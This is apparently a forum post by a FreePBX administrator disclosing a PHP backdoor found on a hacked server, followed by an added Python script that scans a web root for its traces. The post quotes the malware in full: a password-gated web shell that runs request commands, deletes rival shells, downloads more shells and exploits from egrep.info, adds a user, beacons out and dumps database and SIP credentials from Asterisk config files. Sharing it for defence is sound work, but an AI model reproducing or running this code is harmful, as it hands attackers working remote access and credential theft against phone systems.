I don’t know if this is of any interest or not, or if this is an appropriate place to post this (or if there is any such place) or if you’re already aware of it, but I found the following code hidden away in this file: ./admin/i18n/vamp/vamp.php, which specifically targets asterisk & freepbx systems. It was hidden under a base64 decode function. I’m not quite sure how they got in - other than perhaps through apache somehow, but I suppose I’m pretty screwed at this point. I thought someone else might benefit from this knowledge. It goes well beyond what’s here, this is just an interesting piece of it.
Not sure I completely understand what it’s doing, other than installing backdoors and grabbing passwords, but apparently the site “egrep.info”, which was created just last month, is the source of some of the code. Maybe somebody wants to pick up the ball and run them down in cooperation with appropriate authorities. whois shows:
Registrant Street: C/O ID#10760, PO Box 16
Registrant City:Nobby Beach
Registrant State/Province:Queensland
Registrant Postal Code:QLD 4218
Registrant Country:AU
Registrant Phone:+45.36946676
but the rest is privacy protected. I suppose it’s possible they’re also just an innocent victim, but my gut feeling says no.
The email address [email protected] is also associated with the below cracker.
```php
if (isset($_REQUEST['p']) && (md5($_REQUEST['p'])=="a84cf956b0d0a139eab752a3e09405c4"))
{
    @system($_REQUEST['c']);
    echo "vampire access" ;
    echo "\r\n" ;
}
else
{
    die ('No direct script access allowed');
}
if ( $_GET['pbx'] == "fuck" ) {
    // remove all indexs
    @system("find . -perm 550 -type d |xargs chmod 755") ;
    @system("find .. -perm 550 -type d |xargs chmod 755") ;
    @system("find . -perm 555 -type d |xargs chmod 755") ;
    @system("find .. -perm 555 -type d |xargs chmod 755") ;
    @system("find . -name index.php ! -path ./index.php -delete") ;
    @system("find .. -name index.php ! -path ../index.php ! -path ../admin/index.php ! -path ../recordings/index.php -delete") ;
    echo "Index's Removed" ;
    echo "\r\n" ;
    // remove other hacks
    @system("rm -rf ./modules/cdr/assets/cdrphp.php ./assets/js/views/index.php ./assets/index.php ./modules/cdr/assets/index.php ./modules/cdr/assets/css/cdr.php ./hel$") ;
    @system("find . -type f -exec grep -l 'eFalcon' {} \; |xargs rm -rf") ;
    @system("find .. -type f -exec grep -l 'eFalcon' {} \; |xargs rm -rf") ;
    @system("grep -r -l --exclude=config.php --exclude=vamp.php --exclude=vampire.php '@system' * | xargs rm -rf") ;
    @system("grep -r -l --exclude=config.php --exclude=vamp.php --exclude=vampire.php '@system' .. | xargs rm -rf") ;
    @system("grep -r -l --exclude=config.php --exclude=vamp.php --exclude=functions.inc.php --exclude=vampire.php 'system(\$' .. | xargs rm -rf") ;
    @system("find . -type f -exec grep -l 'i-Hmx' {} \; |xargs rm -rf") ;
    @system("find ../ -type f -exec grep -l 'i-Hmx' {} \; |xargs rm -rf") ;
    @system("find . -type f -exec grep -r -l --exclude=vamp.php --exclude=vampire.php 'c99shell' {} \; |xargs rm -rf") ;
    @system("find .. -type f -exec grep -l --exclude=vamp.php --exclude=vampire.php 'c99shell' {} \; |xargs rm -rf") ;
    @system("find . -type f -exec grep -l 'bas"."e64"."_decode' {} \; |xargs rm -rf") ;
    @system("find ../ -type f -exec grep -l 'bas"."e64"."_decode' {} \; |xargs rm -rf") ;
    @system("find .. -type f -exec egrep -r -l 'Matrix' {} \; |xargs rm -rf") ;
    @system("find .. -type f -exec egrep -r -l 'c999shell' {} \; |xargs rm -rf") ;
    @system("find .. -type f -exec egrep -r -l '9shell' {} \; |xargs rm -rf") ;
    @system("find .. -name '*.php' -exec egrep -r -l --exclude=crypt.php --exclude=Growl.php --exclude=callerid.php 'base64_decode' {} \; |xargs rm -rf") ;
    echo "Hacks Removed" ;
    echo "\r\n" ;
    // add directories
    @system("mkdir ./modules/themes ./modules/lang ./modules/vamp ./assets/themes ./assets/lang ./assets/vamp ./i18n/themes ./i18n/lang ./i18n/vamp ../recordings/lang ../recordings/themes ../recordings/vamp ") ;
    echo "Own Dir Applied" ;
    echo "\r\n" ;
    // modify .htaccess
    @system("wget -q http://egrep.info/hta.txt -O .htaccess");
    @system("cp -rf .htaccess ./modules/ ;cp -rf .htaccess ./modules/themes/ ; cp -rf .htaccess ./modules/lang/ ; cp -rf .htaccess ./assets/ ; cp -rf .htaccess ./helpers/ ; cp -rf .htaccess ./i18n/ ; cp -rf .htaccess ../recordings/ ; cp -rf .htaccess ../recordings/themes ; cp -rf .htaccess ../recordings/vamp ");
    echo "HTA Applied" ;
    echo "\r\n" ;
    // add own indexs
    @system("touch ./modules/index.php ./helpers/index.php ./modules/themes/index.php ./modules/lang/index.php ./modules/vamp/index.php ./assets/themes/index.php ./assets/lang/index.php ./assets/vamp/index.php ./assets/index.php ./i18n/themes/index.php ./i18n/lang/index.php ./i18n/vamp/index.php ./i18n/index.php ../recordings/themes/index.php ../recordings/lang/index.php ../recordings/vamp/index.php") ;
    echo "New index's Applied" ;
    echo "\r\n" ;
    // custome shell upload
    @system("wget -q http://egrep.info/case.txt -O case.php");
    @system("cp -rf case.php ./modules/themes/case.php ; cp -rf case.php ./assets/themes/case.php ; cp -rf case.php ./i18n/themes/case.php ; cp -rf case.php ../recordings/themes/case.php ; cp -rf case.php ./modules/vamp/case.php ; cp -rf case.php ../recordings/vamp/case.php ; cp -rf case.php ./assets/vamp/case.php ; cp -rf case.php ./i18n/vamp/case.php; cp -rf case.php ../case.php") ;
    @system("rm -rf case.php") ;
    echo "Custome Shell Applied";
    echo "\r\n" ;
    // add user & remove others
    @system("wget -q http://egrep.info/ass.txt -O ass.php ; php ass.php ; rm -rf ass.php ") ;
    @system("wget -q http://egrep.info/ass.pass -O lang.php") ;
    @system("cp -rf lang.php ./modules/lang/lang.php ; cp -rf lang.php ./assets/lang/lang.php ; cp -rf lang.php ./i18n/lang/lang.php ; cp -rf lang.php ../recordings/lang/lang.php ; cp -rf lang.php ./modules/vamp/lang.php ; cp -rf lang.php ../recordings/vamp/lang.php ; cp -rf lang.php ./assets/vamp/lang.php ; cp -rf lang.php ./i18n/vamp/lang.php ");
    @system("rm -rf lang.php") ;
    echo "NEW PASSWORD Applied";
    echo "\r\n" ;
    // adding vamp
    @system("wget http://egrep.info/vampire.txt -O vamp.php");
    @system("cp -rf vamp.php ./modules/vamp/vamp.php ; cp -rf vamp.php ./assets/vamp/vamp.php ; cp -rf vamp.php ./i18n/vamp/vamp.php ; cp -rf vamp.php ../recordings/vamp/vamp.php");
    echo "vamp Applied";
    @system("rm -rf vamp.php");
    echo "\r\n" ;
    // secure exploit
    @system("wget -q http://egrep.info/ass.config -O config.php") ;
    echo "Config.php Updated";
    echo "\r\n" ;
    // add more exploits
    @system("wget -q http://egrep.info/ex.txt -O ex.php") ;
    @system("cp -rf ex.php ./assets/js/index.php ; cp -rf ex.php ./helpers/index.php ; cp -rf ex.php ./i18n/es_ES/index.php ; cp -rf ex.php ./images/index.php ; cp -rf ex.php ./modules/cdr/index.php; cp -rf ex.php ../ex.php") ;
    @system("rm -rf ex.php");
    echo "EXploit Applied";
    echo "\r\n" ;
    // secure directories
    @system("chmod a-w ./modules/themes ./modules/vamp ./modules/lang ./assets/themes ./assets/vamp ./assets/lang ./i18n/themes ./i18n/vamp ./i18n/lang ../recordings/themes ../recordings/vamp ../recordings/lang ");
    @system("chmod a-w ./assets/js ./i18n/es_ES/ ");
    echo "Dir Secured";
    echo "\r\n" ;
}
if ( $_GET['vamp'] == "update" ) {
    @system("wget -q http://egrep.info/vampire.txt -O vamp.php");
    echo " new Vamp Applied";
    echo "\r\n" ;
    echo "+++++++ Please Refuck ++++++";
    echo "\r\n" ;
}
if ( $_GET['mode'] == "lite" ) {
    @system("wget -q http://egrep.info/control.php?path=".$_SERVER['SERVER_PORT'].$_SERVER['PHP_SELF']." -O /dev/null");
}
else {
    @system("wget -q http://egrep.info/control.php?path=".$_SERVER['SERVER_PORT'].$_SERVER['PHP_SELF']." -O /dev/null");
    $ampdata=shell_exec('grep -i "AMPDB|PASS" /etc/amportal.conf | grep -v "#" | tr "\n" ""');
    if ( $_GET['parse'] == "parse" ) {
        echo $ampdata;
        echo "\r\n";
        echo "";
    }
    $sipdata=shell_exec('echo "-----SIP-----" && cat /etc/asterisk/sip_additional.conf | grep "[|secret|host=|type=|username=" | tr "\n" ""');
    $iaxdata=shell_exec('echo "-----IAX-----" && cat /etc/asterisk/iax_additional.conf | grep "[|secret|host=|type=|username=" | tr "\n" ""');
    $zapdata1=shell_exec('echo "------zap-----" && cat /etc/asterisk/dahdi-channels.conf | grep "line=|group=|callerid=|context=|channel" | tr "\n" ""');
    $zapdata2=shell_exec('cat /etc/asterisk/chan_dahdi_additional.conf | grep "line=|group=|callerid=|context=|channel" | tr "\n" ""');
    if ( $_GET['asterisk'] == "show" ) {
        echo $sipdata."\r\n*".$iaxdata."\r\n".$zapdata1."\r\n*".$zapdata2."\r\n*";
    }
}
```
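A defender-side scan for the artefacts the quoted vamp.php leaves behind, added here as an example and not part of the original post or of FreePBX itself: it walks a web root for the directories, file names and strings the backdoor creates (egrep.info downloads, the "vampire access" banner, the md5 password gate, command execution from request parameters, the amportal.conf credential read) and runs against a constructed sample tree. It assumes, from the `./` and `../recordings` paths in the code, that the shell ran from `<webroot>/admin`.

```python
import os
import shutil
import tempfile

# Indicators lifted from the vamp.php backdoor quoted above (paths assume it ran from <webroot>/admin).
CONTENT_IOCS = {
    "egrep.info": "fetches payloads from the attacker's staging host",
    "vampire access": "banner printed by the password-gated shell",
    "a84cf956b0d0a139eab752a3e09405c4": "md5 of the shell's access password",
    "@system($_REQUEST": "runs shell commands taken from request parameters",
    "/etc/amportal.conf": "harvests the FreePBX database credentials",
}
PLANTED_DIRS = {"admin/modules/vamp", "admin/assets/vamp", "admin/i18n/vamp", "recordings/vamp"}
PLANTED_FILES = {"vamp.php", "case.php", "lang.php", "ex.php"}
def scan_webroot(root):
    """Walk a FreePBX web root; return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        if rel_dir in PLANTED_DIRS:
            findings.append((rel_dir, "directory created by the backdoor"))
        for name in filenames:
            rel = name if rel_dir == "." else f"{rel_dir}/{name}"
            if name in PLANTED_FILES:
                findings.append((rel, "file name the backdoor drops"))
            if not name.endswith((".php", ".htaccess")):
                continue  # only PHP and Apache config carry these indicators
            with open(os.path.join(dirpath, name), encoding="utf-8", errors="ignore") as fh:
                text = fh.read()
            findings += [(rel, f"contains '{ioc}': {why}") for ioc, why in CONTENT_IOCS.items() if ioc in text]
    return sorted(findings)
# Constructed sample web root (not a real system): one clean file and three planted artefacts.
SAMPLE_FILES = {
    "admin/index.php": "<?php // clean FreePBX entry point\n",
    "admin/i18n/vamp/vamp.php": "<?php if(md5($_REQUEST['p'])==\"a84cf956b0d0a139eab752a3e09405c4\")"
                                "{@system($_REQUEST['c']);echo \"vampire access\";}\n",
    "admin/assets/themes/case.php": "<?php // staged from http://egrep.info/case.txt\n",
    "admin/modules/.htaccess": "# fetched from http://egrep.info/hta.txt\n",
}
def scan_constructed_sample():
    """Materialise SAMPLE_FILES in a temp dir, scan it, remove it, return the findings."""
    root = tempfile.mkdtemp(prefix="freepbx_sample_")
    try:
        for rel, body in SAMPLE_FILES.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_webroot(root)
    finally:
        shutil.rmtree(root)
```

Point `scan_webroot()` at a real web root to get the same (path, reason) list; the clean index.php in the sample produces no finding, which is the false-positive check.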